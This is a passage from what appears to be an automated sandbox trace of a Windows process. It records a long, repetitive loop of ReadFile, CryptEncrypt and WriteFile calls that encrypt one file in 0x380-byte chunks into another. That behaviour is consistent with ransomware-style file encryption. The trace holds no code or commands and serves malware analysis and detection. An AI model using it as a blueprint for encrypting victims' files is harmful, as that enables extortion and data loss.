pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.440] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.440] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.440] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.440] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.440] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.440] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.440] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.440] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.441] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.441] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.441] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.441] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.441] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.441] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.441] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.441] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.441] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.441] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.441] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.441] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.441] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.441] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.442] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.442] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.442] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.442] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.442] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.442] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.442] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.442] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.442] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.442] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.442] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.442] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.442] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.443] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.443] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.443] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.443] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.443] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.443] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.443] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.443] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.443] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.443] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.443] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.443] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.443] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.443] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.444] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.444] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.444] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.444] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.444] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.444] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.444] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.444] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.444] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.445] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.445] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.445] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.445] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.445] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.445] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.445] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.445] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.445] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.445] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.445] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.445] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.445] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.445] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.445] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.446] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.446] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.446] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.446] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.446] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.446] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.446] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.446] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.446] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.446] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.446] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.446] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.447] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.447] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.447] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.447] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.447] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.447] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.447] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.447] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.447] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.447] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.447] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.447] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.448] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.448] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.448] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, 